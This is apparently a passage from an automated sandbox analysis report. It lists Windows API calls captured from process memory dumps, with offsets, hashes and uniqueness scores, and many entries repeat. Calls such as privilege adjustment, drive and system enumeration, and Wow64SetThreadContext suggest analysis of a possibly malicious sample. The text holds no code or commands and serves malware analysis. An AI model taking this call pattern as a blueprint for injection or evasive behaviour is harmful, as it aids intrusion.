                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleMode
                                                        • String ID:
                                                        • API String ID: 4145635619-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0289132F
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01CAA94A
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02890502
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02890FB0
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02890640
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01CAABC9
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02891148
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetErrorMode.KERNELBASE(?), ref: 01CAA39C
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0289099C
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124622211.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01CAAA71
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01CAA9C8
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01CAA9C8
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120441395.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124688856.00000000028D0000.00000040.00000040.sdmp, Offset: 028D0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2124688856.00000000028D0000.00000040.00000040.sdmp, Offset: 028D0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2156193371.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120421678.0000000001CA2000.00000040.00000001.sdmp, Offset: 01CA2000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.2120421678.0000000001CA2000.00000040.00000001.sdmp, Offset: 01CA2000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Executed Functions

                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 020DAD37
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 020DAD37
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 020DB329
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 020DB329
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 028301D0
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0283072D
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02830DD6
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,9797AD96,00000000,00000000,00000000,00000000), ref: 020DBDBC
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,9797AD96,00000000,00000000,00000000,00000000), ref: 020DAFBE
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0283109E
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,9797AD96,00000000,00000000,00000000,00000000), ref: 020DB0AE
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • EnumWindows.USER32(?,00000E9C,?,?), ref: 020DA23E
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumWindows
                                                        • String ID:
                                                        • API String ID: 1129996299-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,9797AD96,00000000,00000000,00000000,00000000), ref: 02830819
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02830502
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0283072D
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,9797AD96,00000000,00000000,00000000,00000000), ref: 028308E5
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 020DA94A
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02830DD6
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,9797AD96,00000000,00000000,00000000,00000000), ref: 020DBDBC
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02830FB0
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,9797AD96,00000000,00000000,00000000,00000000), ref: 020DB0AE
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 020DAB1A
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleScreenBufferInfo.KERNEL32 ref: 020DBB2F
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: BufferConsoleInfoScreen
                                                        • String ID:
                                                        • API String ID: 3437242342-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02831148
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,9797AD96,00000000,00000000,00000000,00000000), ref: 020DAFBE
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,9797AD96,00000000,00000000,00000000,00000000), ref: 028308E5
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 020DBA7E
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0283132F
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: Flags
                                                        • String ID:
                                                        • API String ID: 3401871038-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02830640
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0283099C
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 020DAA71
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 020DAB1A
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,9797AD96,00000000,00000000,00000000,00000000), ref: 02830819
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 020DABC9
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 020DBA7E
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 028301D0
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0283109E
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • EnumWindows.USER32(?,00000E9C,?,?), ref: 020DA23E
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumWindows
                                                        • String ID:
                                                        • API String ID: 1129996299-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0283132F
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleScreenBufferInfo.KERNEL32 ref: 020DBB2F
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: BufferConsoleInfoScreen
                                                        • String ID:
                                                        • API String ID: 3437242342-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02830502
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02830FB0
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 020DA94A
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02830640
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 020DABC9
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02831148
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0283099C
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2123314856.0000000002830000.00000040.00000001.sdmp, Offset: 02830000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: Flags
                                                        • String ID:
                                                        • API String ID: 3401871038-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 020DAA71
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 020DA9C8
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 020DA9C8
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.2121256562.00000000020DA000.00000040.00000001.sdmp, Offset: 020DA000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Executed Functions

                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00263BB6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2165303149.0000000000260000.00000040.00000001.sdmp, Offset: 00260000, based on PE: false
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID: I-
                                                        • API String ID: 983334009-633191110
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • KiUserExceptionDispatcher.NTDLL ref: 002618A8
                                                        • KiUserExceptionDispatcher.NTDLL ref: 002618BA
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2165303149.0000000000260000.00000040.00000001.sdmp, Offset: 00260000, based on PE: false
                                                        Similarity
                                                        • API ID: DispatcherExceptionUser
                                                        • String ID:
                                                        • API String ID: 6842923-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
